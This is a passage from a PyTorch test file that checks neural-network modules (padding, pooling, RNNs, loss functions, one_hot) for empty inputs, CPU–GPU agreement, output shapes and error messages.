@onlyOnCPUAndCUDA
def test_Transformer_empty(self, device):
for batch_first, src_shape, tgt_shape in [(True, (10, 0, 512), (20, 0, 512))]:
transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12).to(device)
src = torch.rand(*src_shape, requires_grad=True, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
self._test_module_empty_inputs(transformer_model, [src, tgt])
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.complex64)
def test_ReflectionPad_empty(self, device, dtype):
for mod, inp in [
(torch.nn.ReflectionPad1d(2), torch.randn(0, 3, 10, device=device, dtype=dtype)),
(torch.nn.ReflectionPad2d(2), torch.randn(0, 3, 10, 10, device=device, dtype=dtype)),
(torch.nn.ReflectionPad3d(3), torch.randn(0, 3, 10, 10, 10, device=device, dtype=dtype))]:
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, '2D or 3D'):
mod = torch.nn.ReflectionPad1d(2)
inp = torch.randn(3, 0, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, '3D or 4D'):
mod = torch.nn.ReflectionPad2d(2)
inp = torch.randn(3, 0, 10, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, '4D or 5D'):
mod = torch.nn.ReflectionPad3d(3)
inp = torch.randn(3, 0, 10, 10, 10, device=device, dtype=dtype)
mod(inp)
@onlyCUDA # Test if CPU and GPU results match
def test_ReflectionPad2d_large(self, device):
shapes = ([2, 65736, 6, 6], [65736, 2, 6, 6])
pad = (1, 2, 3, 4)
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
ref_x = x.detach().cpu().requires_grad_()
out = F.pad(x, pad, mode='reflect')
ref_out = F.pad(ref_x, pad, mode='reflect')
self.assertEqual(out, ref_out)
g = torch.randn_like(out)
ref_g = g.cpu()
out.backward(g)
ref_out.backward(ref_g)
self.assertEqual(x.grad, ref_x.grad)
@onlyOnCPUAndCUDA
def test_LocalResponseNorm_empty(self, device):
mod = torch.nn.LocalResponseNorm(2).to(device)
inp = torch.ones(0, 5, 24, 24, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
@onlyCUDA # Test if CPU and GPU results match
def test_ReflectionPad3d_large(self, device):
shapes = ([2, 1000, 7, 7, 7], [1000, 2, 7, 7, 7])
pad = (1, 2, 3, 4, 5, 6)
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
ref_x = x.detach().cpu().requires_grad_()
out = F.pad(x, pad, mode='reflect')
ref_out = F.pad(ref_x, pad, mode='reflect')
self.assertEqual(out, ref_out)
g = torch.randn_like(out)
ref_g = g.cpu()
out.backward(g)
ref_out.backward(ref_g)
self.assertEqual(x.grad, ref_x.grad)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_MarginLoss_empty(self, device, dtype):
for mod, x, y in [
(torch.nn.MultiMarginLoss().to(device),
torch.randn(0, 10, requires_grad=True, device=device, dtype=dtype),
torch.ones(0, device=device).type(torch.long)),
(torch.nn.MultiLabelMarginLoss().to(device),
torch.randn(0, 10, requires_grad=True, device=device, dtype=dtype),
torch.ones(0, 10, device=device).type(torch.long))]:
out = mod(x, y)
out.sum().backward()
self.assertEqual(x, torch.zeros_like(x))
self.assertEqual(x.grad, torch.zeros_like(x))
with self.assertRaisesRegex(RuntimeError, 'Expected'):
x = torch.randn(0, requires_grad=True, device=device, dtype=dtype)
y = torch.ones(10, device=device).type(torch.long)
mod(x, y)
with self.assertRaisesRegex(RuntimeError, 'Expected'):
x = torch.randn(10, 0, requires_grad=True, device=device, dtype=dtype)
y = torch.ones(10, 0, device=device).type(torch.long)
mod(x, y)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_adaptive_pooling_zero_batch(self, dtype, device):
inp = torch.ones(0, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool1d(5).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
inp = torch.ones(0, 10, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool2d((5, 5)).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
inp = torch.ones(0, 10, 10, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool3d((5, 5, 5)).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
@onlyOnCPUAndCUDA
def test_FractionalMaxPool2d_zero_batch(self, device):
mod = nn.FractionalMaxPool2d(3, output_ratio=(0.5, 0.5))
inp = torch.ones(0, 16, 50, 32, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected input"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_FractionalMaxPool3d_zero_batch(self, device):
mod = nn.FractionalMaxPool3d(3, output_ratio=(0.5, 0.5, 0.5)).to(device)
inp = torch.ones(0, 16, 50, 32, 32, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected input"):
inp = torch.randn(1, 0, 50, 32, 32, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_Unfold_empty(self, device):
inp = torch.randn(0, 3, 3, 4, device=device)
unfold = torch.nn.Unfold(kernel_size=(2, 3)).to(device)
self._test_module_empty_input(unfold, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, 'Expected 3D or 4D'):
inp = torch.randn(3, 0, 3, 4, device=device)
unfold = torch.nn.Unfold(kernel_size=(2, 3)).to(device)
unfold(inp)
@onlyOnCPUAndCUDA
def test_MaxPool_zero_batch_dim(self, device):
inp = torch.randn(0, 16, 50, device=device)
mod = torch.nn.MaxPool1d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
# 1D is supposed to be okay with 0 numel() inputs so don't test
# error raising for that case.
inp = torch.randn(0, 16, 50, 32, device=device)
mod = torch.nn.MaxPool2d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
inp = torch.ones(0, 16, 50, 44, 31, device=device)
mod = torch.nn.MaxPool3d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.ones(1, 0, 50, 44, 31, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_MaxUnpool_zero_batch_dim(self, device):
pool = torch.nn.MaxPool1d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool1d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
output.requires_grad_(True)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
pool = torch.nn.MaxPool2d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool2d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
pool = torch.nn.MaxPool3d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool3d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
output.requires_grad_(True)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
@onlyOnCPUAndCUDA
def test_AdaptiveMaxPool_zero_batch_dim(self, device):
inp = torch.randn(0, 16, 50, device=device)
mod = torch.nn.AdaptiveMaxPool1d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, device=device)
mod(inp)
inp = torch.randn(0, 16, 50, 32, device=device)
mod = torch.nn.AdaptiveMaxPool2d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
inp = torch.ones(0, 16, 50, 44, 31, device=device)
mod = torch.nn.AdaptiveMaxPool3d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.ones(1, 0, 50, 44, 31, device=device)
mod(inp)
@onlyCUDA
@dtypes(torch.float, torch.double)
@tf32_on_and_off(0.005)
def test_rnn_fused(self, device, dtype):
def copy_rnn(rnn1, rnn2):
for x_layer, y_layer in zip(rnn1.all_weights, rnn2.all_weights):
for x, y in zip(x_layer, y_layer):
x.data.copy_(y.data)
def check_rnn_grads(rnn1, rnn2):
for x_layer, y_layer in zip(rnn1.all_weights, rnn2.all_weights):
for x, y in zip(x_layer, y_layer):
self.assertEqual(x.grad, y.grad, atol=5e-5, rtol=0)
input_size = 10
hidden_size = 6
num_layers = 2
seq_length = 7
batch = 6
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, hidden_size, dtype=dtype)
hx_val = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
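# Disable cuDNN so the CUDA path falls back to the native fused
# GRU/LSTM cell kernels, which are what this test targets.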
with torch.backends.cudnn.flags(enabled=False, allow_tf32=None):
for module in (nn.GRU, nn.LSTM):
for bias in (True, False):
rnn = module(input_size, hidden_size, num_layers, bias=bias).to(dtype)
rnn_device = module(input_size, hidden_size, num_layers, bias=bias).to(device, dtype)
copy_rnn(rnn, rnn_device)
is_lstm = isinstance(rnn, nn.LSTM)
if is_lstm:
hx = (hx_val.clone().requires_grad_(True),
hx_val.clone().add(1).requires_grad_(True))
hx_device = (hx_val.clone().to(device).requires_grad_(True),
hx_val.clone().to(device).add(1).requires_grad_(True))
else:
hx = hx_val.clone().requires_grad_(True)
hx_device = hx_val.clone().to(device).requires_grad_(True)
inp = input_val.clone().requires_grad_(True)
inp_cu = input_val.clone().to(device).requires_grad_(True)
output1, hy1 = rnn(inp, hx)
output2, hy2 = rnn_device(inp_cu, hx_device)
if is_lstm:
torch.autograd.backward(
[output1, hy1[0], hy1[1]], [grad_output, grad_hy, grad_hy + 1]
)
torch.autograd.backward(
[output2, hy2[0], hy2[1]],
[grad_output.to(device), grad_hy.to(device), (grad_hy + 1).to(device)]
)
else:
torch.autograd.backward([output1, hy1], [grad_output, grad_hy])
torch.autograd.backward([output2, hy2], [grad_output.to(device), grad_hy.to(device)])
self.assertEqual(output1, output2)
self.assertEqual(hy1, hy2)
check_rnn_grads(rnn, rnn_device)
self.assertEqual(inp.grad, inp_cu.grad)
if is_lstm:
self.assertEqual(hx[0].grad, hx_device[0].grad)
self.assertEqual(hx[1].grad, hx_device[1].grad)
else:
self.assertEqual(hx.grad, hx_device.grad)
def test_BatchNorm_empty(self, device):
mod = torch.nn.BatchNorm2d(3).to(device)
inp = torch.randn(0, 3, 2, 2, device=device)
self._test_module_empty_input(mod, inp)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp)
self.assertEqual(mod.running_mean, torch.tensor([0., 0, 0], device=device))
self.assertEqual(mod.running_var, torch.tensor([1., 1, 1], device=device))
self.assertEqual(mod.weight.grad, torch.tensor([0., 0, 0], device=device))
self.assertEqual(mod.bias.grad, torch.tensor([0., 0, 0], device=device))
def test_group_conv_empty(self, device):
mod = torch.nn.Conv2d(4, 4, stride=2, kernel_size=3, padding=1, groups=4).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
def test_group_convTranspose_empty(self, device):
mod = torch.nn.ConvTranspose2d(4, 4, stride=2, kernel_size=3, padding=1, groups=4).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
def test_convTranspose_empty(self, device):
mod = torch.nn.ConvTranspose2d(4, 4, stride=2, kernel_size=3, padding=1).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
@onlyOnCPUAndCUDA
def test_AvgPool2d_empty(self, device):
avgpool = torch.nn.AvgPool2d(3, stride=2).to(device)
inp = torch.randn(0, 16, 20, 32, device=device)
self._test_module_empty_input(avgpool, inp, check_size=False)
clast_inp = torch.randn(0, 16, 20, 32, device=device).contiguous(memory_format=torch.channels_last)
self._test_module_empty_input(avgpool, clast_inp, check_size=False)
# test with empty non-batch input
with self.assertRaisesRegex(RuntimeError, '3D or 4D'):
inp = torch.randn(16, 0, 20, 32, device=device)
avgpool(inp)
@onlyCUDA
@largeTensorTest('16GB')
def test_prelu_backward_32bit_indexing(self, device):
m = torch.nn.PReLU().cuda().half()
input_ = torch.ones((1024, 1024, 1024, 2), dtype=torch.half, device=device)
output = m(input_)
output.backward(input_)
def test_linear_empty(self, device):
mod = torch.nn.Linear(7, 7).to(device)
inp = torch.randn(0, 7, device=device)
self._test_module_empty_input(mod, inp)
def test_one_hot(self, device):
if self.device_type != 'cuda': # cuda throws device assert for invalid data
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, -1, 0], device=device), -1)
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), 3)
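# With num_classes omitted (or passed as -1), one_hot infers
# num_classes = input.max() + 1; the max value below is 4, hence 5 classes.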
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device))
expected = torch.tensor([[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), -1)
expected = torch.tensor([[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), 6)
expected = torch.tensor([[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([[3, 4], [1, 0]], device=device))
expected = torch.tensor([[[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]],
[[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor(4, device=device))
expected = torch.tensor([0, 0, 0, 0, 1], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.empty([4, 0], dtype=torch.long, device=device), 100)
expected = torch.empty([4, 0, 100], dtype=torch.long)
self.assertEqual(t, expected)
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.empty([4, 0], dtype=torch.long, device=device))
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), -2)
def test_nn_scalars(self, device):
# One-off tests to ensure scalars from nn.yaml are properly applied
def verify_scalars(input, output):
if input.dim() == 0:
self.assertEqual((), output.shape)
else:
self.assertNotEqual((), output.shape)
output.sum().backward()
self.assertEqual(input.shape, input.grad.shape)
for input_shape in [(5, 6), ()]:
for module in [torch.nn.ELU, torch.nn.Hardtanh, torch.nn.LeakyReLU, torch.nn.LogSigmoid,
torch.nn.RReLU, torch.nn.Softshrink, torch.nn.Softplus, torch.nn.Sigmoid,
torch.nn.Tanh]:
input = torch.randn(input_shape, device=device, requires_grad=True)
m = module()
output = m(input)
verify_scalars(input, output)
def test_nn_scalars_reductions(self, device):
# One-off tests to ensure scalars from nn.yaml are properly applied
def verify_reduction_scalars(input, reduction, output):
if reduction != 'none' or input.dim() == 0:
self.assertEqual((), output.shape)
else:
self.assertNotEqual((), output.shape)
output.sum().backward()
self.assertEqual(input.shape, input.grad.shape)
for input_shape in [(5, 6), ()]:
for reduction in ['none', 'mean', 'sum']:
for module in [torch.nn.BCELoss, torch.nn.L1Loss, torch.nn.MSELoss,
torch.nn.SmoothL1Loss, torch.nn.SoftMarginLoss]:
target = torch.empty(input_shape, device=device).random_(2)
sigmoid = nn.Sigmoid()
input = torch.randn(input_shape, device=device, requires_grad=True)
m = module(reduction=reduction)
output = m(sigmoid(input), target)
verify_reduction_scalars(input, reduction, output)
# verify that bogus reduction strings are errors
@onlyOnCPUAndCUDA
def test_invalid_reduction_strings(self, device):
input = torch.randn(3, 5, requires_grad=True, device=device)
cinput = torch.randn(3, 5, requires_grad=True, device=device, dtype=torch.cfloat)
target = torch.tensor([1, 0, 4], device=device)
var = torch.ones(size=input.size(), requires_grad=True, device=device)
for reduction in ['none', 'invalid']:
def v(fn):
if reduction == 'invalid':
self.assertRaises(ValueError, lambda: fn())
else:
fn()
v(lambda: F.nll_loss(input, target, reduction=reduction))
v(lambda: F.cross_entropy(input, target, reduction=reduction))
v(lambda: F.multi_margin_loss(input, target, reduction=reduction))
v(lambda: F.kl_div(input, input, reduction=reduction))
v(lambda: F.huber_loss(input, input, reduction=reduction))
v(lambda: F.smooth_l1_loss(input, input, reduction=reduction))
v(lambda: F.l1_loss(input, input, reduction=reduction))
v(lambda: F.l1_loss(cinput, cinput, reduction=reduction))
v(lambda: F.mse_loss(input, input, reduction=reduction))
v(lambda: F.hinge_embedding_loss(input, input, reduction=reduction))
v(lambda: F.poisson_nll_loss(input, input, reduction=reduction))
v(lambda: F.gaussian_nll_loss(input, input, var, reduction=reduction))
v(lambda: F.binary_cross_entropy(torch.sigmoid(input), input, reduction=reduction))
v(lambda: F.binary_cross_entropy_with_logits(input, input, reduction=reduction))
zeros = torch.zeros_like(input).to(torch.int64)
v(lambda: F.multilabel_soft_margin_loss(input, zeros, reduction=reduction))
v(lambda: F.multilabel_margin_loss(input, zeros, reduction=reduction))
v(lambda: F.triplet_margin_loss(input, input, input, reduction=reduction))
v(lambda: F.triplet_margin_with_distance_loss(input, input, input, reduction=reduction))
v(lambda: F.margin_ranking_loss(input, input, input.sign(), reduction=reduction))
v(lambda: F.cosine_embedding_loss(input, input, input[:, 0].sign(), reduction=reduction))
log_probs = torch.randn(50, 16, 20, requires_grad=True, device=device).log_softmax(2)
targets = torch.randint(1, 20, (16, 30), dtype=torch.long, device=device)
input_lengths = torch.full((16,), 50, dtype=torch.long, device=device)
target_lengths = torch.randint(10, 30, (16,), dtype=torch.long, device=device)
v(lambda: F.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction=reduction))
# FIXME: should we allow derivatives on these?
v(lambda: F.soft_margin_loss(input, input.sign().detach(), reduction=reduction))
@onlyOnCPUAndCUDA
def test_smooth_l1_loss_vs_huber_loss(self, device):
def _make_test_tensor(shape, contiguous=True):
if contiguous:
test_tensor = torch.randn(shape, device=device)
else:
# Select every other element in the innermost dimension to
# make it non-contiguous.
doubled_shape = list(shape)
doubled_shape[-1] *= 2
test_tensor = torch.randn(doubled_shape, device=device)
test_tensor = test_tensor[..., ::2]
return test_tensor
def _test_smooth_l1_loss_vs_huber_loss_helper(input, target, beta, require_equal):
for reduction in ['mean', 'sum', 'none']:
smooth_l1 = torch.nn.SmoothL1Loss(beta=beta, reduction=reduction)
# beta hyper-parameter is called delta for Huber
huber = torch.nn.HuberLoss(delta=beta, reduction=reduction)
smooth_l1_loss = smooth_l1(input, target)
huber_loss = huber(input, target)
if require_equal:
self.assertEqual(smooth_l1_loss, huber_loss)
else:
# Otherwise the two differ: Huber loss equals the smooth L1 loss scaled by beta (see derivation below).
self.assertEqual(smooth_l1_loss * beta, huber_loss)
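# Why the factor of beta: with residual d = input - target,
#   SmoothL1(beta): 0.5 * d**2 / beta  if |d| < beta, else |d| - 0.5 * beta
#   Huber(delta):   0.5 * d**2         if |d| < delta, else delta * (|d| - 0.5 * delta)
# so with delta == beta, Huber == beta * SmoothL1 pointwise, and therefore
# also under the 'sum'/'mean' reductions by linearity.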
def _test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta, require_equal):
# Test the non-vectorized case.
shape = (2, 2)
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape),
target=_make_test_tensor(shape),
beta=beta,
require_equal=require_equal)
# Test the vectorized case (innermost dim > 32).
shape = (64, 64)
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape),
target=_make_test_tensor(shape),
beta=beta,
require_equal=require_equal)
# Test the non-contiguous case.
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape, contiguous=False),
target=_make_test_tensor(shape, contiguous=False),
beta=beta,
require_equal=require_equal)
def test_equal_when_beta_is_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=1.0, require_equal=True)
def test_unequal_when_beta_is_less_than_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=0.5, require_equal=False)
def test_unequal_when_beta_is_greater_than_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=1.5, require_equal=False)
test_equal_when_beta_is_one()
test_unequal_when_beta_is_less_than_one()
test_unequal_when_beta_is_greater_than_one()
# We don't want to make propagating NaN a hard requirement on ops, but for
# these easy ones, we should make them do so.
def test_nonlinearity_propagate_nan(self, device):
def test(nonlinearity, *args, **kwargs):
x = torch.tensor([nan], device=device)
fn = getattr(F, nonlinearity)
try:
self.assertTrue(math.isnan(fn(x, *args, **kwargs).item()))
except Exception as e:
if 'not implemented' not in str(e):
raise
test('relu')
test('relu', inplace=True)
test('relu6')
test('elu')
test('selu')
test('celu')
test('rrelu')
test('rrelu', inplace=True)
test('hardtanh')
test('tanh')
test('sigmoid')
test('logsigmoid')
test('hardshrink')
test('tanhshrink')
test('softsign')
test('softmin', 0)
test('softmax', 0)
test('log_softmax', 0)
test('leaky_relu', 0.2)
test('threshold', 3, 2)
test('threshold', 3, 2, inplace=True)
def test_pooling_shape(self, device):
''' Test the output shape calculation for pooling functions '''
# Checks output shape against expected for 1D, 2D and 3D
def check(expected_out_shape, sizes, *args, **kwargs):
for kernel in ['max', 'avg']:
for i in [1, 2, 3]:
if hasattr(torch.nn.functional, f'{kernel}_pool{i}d'):
op = getattr(torch.nn.functional, f'{kernel}_pool{i}d')
t = torch.randn(sizes[:i + 2], device=device)
self.assertEqual(op(t, *args, **kwargs).shape, expected_out_shape[:i + 2])
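# With dilation=1 the expected size per spatial dim is
#   L_out = floor((L_in + 2 * padding - kernel_size) / stride) + 1
# (ceil instead of floor when ceil_mode=True, except that a window which
# would start at or past the end of the padded input is dropped).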
check((1, 1, 3, 3, 4), (1, 1, 5, 6, 7), kernel_size=1, stride=2, padding=0, ceil_mode=True)
check((1, 1, 2, 3, 3), (1, 1, 3, 4, 5), kernel_size=2, stride=2, padding=1, ceil_mode=False)
check((1, 1, 2, 3, 3), (1, 1, 3, 4, 5), kernel_size=2, stride=2, padding=1, ceil_mode=True)
# Test case from issue https://github.com/pytorch/pytorch/issues/45357
x = torch.randn(1, 1, 6, 7, device=device)
y = torch.nn.functional.max_pool2d(x, 1, stride=(2, 2), padding=0, ceil_mode=True)
self.assertEqual(y.size(), (1, 1, 3, 4))
@onlyOnCPUAndCUDA # TODO: fix on XLA
def test_adaptive_avg_pool2d_output_size_one(self, device):
def helper(size, memory_format):
x = torch.randint(1, 10, size, dtype=torch.float, device=device, requires_grad=True)
if memory_format == 'non_contiguous':
x = x[::2, ::2, ::2, ::2]
else:
x = x.to(memory_format=memory_format)
net = torch.nn.AdaptiveAvgPool2d((1, 1))
out = net(x)
ref_out = x.contiguous().mean((-1, -2)).view((x.size(0), x.size(1), 1, 1))
out.sum().backward() # make sure it doesn't crash
self.assertEqual(out, ref_out)
if memory_format == torch.channels_last:
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, c, c])
else:
self.assertTrue(out.is_contiguous())
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, 1, 1])
for mf in (torch.contiguous_format, torch.channels_last, 'non_contiguous'):
helper((2, 3, 6, 6), mf)
@onlyOnCPUAndCUDA
def test_adaptive_avg_pool3d_output_size_one(self, device):
x = torch.randn((2, 3, 6, 6, 6) , dtype=torch.float, device=device, requires_grad=True)
net = torch.nn.AdaptiveAvgPool3d(1)
out = net(x)
ref_out = x.contiguous().mean((-1, -2, -3)).view(out.shape)
out.sum().backward() # make sure it doesn't crash
self.assertEqual(out, ref_out)
self.assertTrue(out.is_contiguous())
c = out.size(1)
self.assertEqual(out.stride(), [c, 1, 1, 1, 1])
@onlyOnCPUAndCUDA
@dtypes(torch.uint8, torch.int8, torch.short, torch.int, torch.long)
def test_adaptive_pooling_no_support_input(self, device, dtype):
for numel in (2, 3):
for pool_type in ('Max', 'Avg'):
cls_name = 'Adaptive{}Pool{}d'.format(pool_type, numel)
module_cls = getattr(nn, cls_name)
output_size = (2,) * numel
module = module_cls(output_size)
input = torch.randn((4,) * (numel + 1), device=device).to(dtype)
with self.assertRaisesRegex(RuntimeError, "not implemented"):
output = module(input)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
def test_avg_pool2d_nhwc(self, device, dtype):
def helper(n, c, h, w, kernel_size, stride=None,
count_include_pad=True, divisor_override=None, padding=0):
if stride is None:
stride = kernel_size
input = torch.randn(n, c, h, w, dtype=dtype, device=device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
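# channels_last input exercises the NHWC kernels; the contiguous clones
# below serve as the NCHW reference for both forward and backward.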
grad = torch.randn(n, c, (h - kernel_size) // stride + 1, (w - kernel_size) // stride + 1,
dtype=dtype, device=device)
pool = torch.nn.AvgPool2d(kernel_size, stride=stride, count_include_pad=count_include_pad,
divisor_override=divisor_override).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AvgPool2d(kernel_size, stride=stride, count_include_pad=count_include_pad,
divisor_override=divisor_override).to(device)
out = pool(input)
out.backward(grad)
ref_out = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(input.grad, ref_input.grad)
helper(4, 8, 8, 8, 3)
helper(4, 8, 8, 8, 3, count_include_pad=False, padding=1)
helper(4, 8, 8, 8, 3, count_include_pad=False, padding=2, stride=2)
helper(4, 8, 8, 8, 3, divisor_override=42)
helper(4, 8, 8, 8, 7)
# ROCm 16GB MI25 hits OOM error. Clear caching allocator prior to running large subtest.
if TEST_WITH_ROCM and 'cuda' in device:
torch.cuda.empty_cache()
helper(200, 512, 28, 28, 2)
helper(4, 8, 7, 7, 3, stride=1)
helper(4, 8, 7, 7, 3, padding=2, stride=1)
helper(10, 512, 31, 31, 3, stride=2)
helper(1, 129, 8, 8, 3, stride=2)
@onlyCPU
@dtypes(torch.float)
def test_max_pool1d_errors(self, device, dtype):
def check(x, args, message):
model = torch.nn.MaxPool1d(*args)
with self.assertRaisesRegex(RuntimeError, r'max_pool1d\(\) ' + message):
model(torch.tensor(x, device=device, dtype=dtype))
# Pooling args: (kernel_size, stride, padding, dilation, return_indices, ceil_mode)
check(0, (1,), "Expected 2D or 3D input tensor, but got")
check([], (1,), "Expected 2D or 3D input tensor, but got")
check([[]], (1, 0), "stride must be greater than zero, but got 0")
check([[]], (1, 1, -1), "padding must be non-negative, but got -1")
check([[]], (1, 1, 2), "padding should be at most half of kernel size, but got padding=2 and kernel_size=1")
check([[]], (1, 1, 0, 0), "dilation must be greater than zero, but got 0")
check([[]], (5, 1, 0, 1), "Invalid computed output size: -4")
@onlyCPU
@dtypes(torch.float, torch.double)
def test_max_pool1d_corner_cases(self, device, dtype):
def check(x, args, expected):
model = torch.nn.MaxPool1d(*args)
if isinstance(x, list):
x = torch.tensor(x, device=device, dtype=dtype)
expected = torch.tensor(expected, device=device, dtype=dtype)
self.assertEqual(model(x), expected)
# Pooling args: (kernel_size, stride, padding, dilation, return_indices, ceil_mode)
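# Max pooling implicitly pads with -inf, so a window that covers only
# padding produces -inf (see the single-element cases below).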
check([[]], (1, None, 0, 1, False, False), [[]])
check([[[]]], (1, None, 0, 1, False, False), [[[]]])
check([[[]]], (2, 1, 1, 2, False, True), [[[]]])
check([[1]], (1, None, 0, 1, False, False), [[1]])
check([[1]], (2, None, 1, 2, False, False), [[float('-inf')]])
check([[1], [1]], (2, None, 1, 2, False, False), [[float('-inf')], [float('-inf')]])
check([[1, 2]], (2, 1, 1, 2, False, False), [[2, 1]])
check([[1, 2]], (2, 2, 1, 2, False, True), [[2, 2]])
empty_tensor = torch.empty((2, 0, 1), device=device, dtype=dtype)
check(empty_tensor, (1, None, 0, 1, False, False), empty_tensor)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_max_pool1d(self, device, dtype):
# FIXME For now compare against max_pool1d with indices
